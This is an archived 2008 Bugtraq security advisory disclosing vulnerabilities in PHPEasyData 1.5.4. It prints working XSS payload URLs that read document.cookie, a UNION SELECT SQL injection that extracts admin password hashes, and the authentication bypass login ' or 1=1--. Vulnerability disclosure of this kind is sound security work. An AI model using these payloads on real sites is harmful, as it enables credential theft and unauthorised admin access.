| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 10 Jun 2008 23:23:46 +0200 From: Sylvain <sylvain.thual@...ck-internet.fr> To: bugtraq@...urityfocus.com Subject: PHPEasyData 1.5.4 Multiple Vulnerabilities ------------- *PHPEasyData* ------------- Informations : ************** Langage : PHP Version : 1.5.4 Website : http://www.phpeasydata.com/ Problems : Multiple vulnerabilities Description: ************ PHPEasyData is a PHP application which allow you to manage and display on the web your dynamics data and directories. Details : ********* --------- ** Xss ** --------- There are multiple xss vulnerabilities. Demonstration exploit URL: -last_records.php: http://[website]/last_records.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E -annuaire.php: http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=&by=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[website]/annuaire.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E ------------------- ** SQL Injection ** ------------------- -annuaire.php http://[website]/annuaire.php?annuaire=29%20union%20select%20user_pass,user_login,user_fname,user_access%20from%20an_users With this url we can have the admin password(crypted with md5) for example. -admin/login.php Due to a lack of sanitization of the user input in admin/login.php we can easily get an access to the admin control panel with the login: ' or 1=1-- /** Credits: ******** Autor : Sylvain THUAL E-mail : contact@...ck-internet.fr Website : http://www.click-internet.fr
Powered by blists - more mailing lists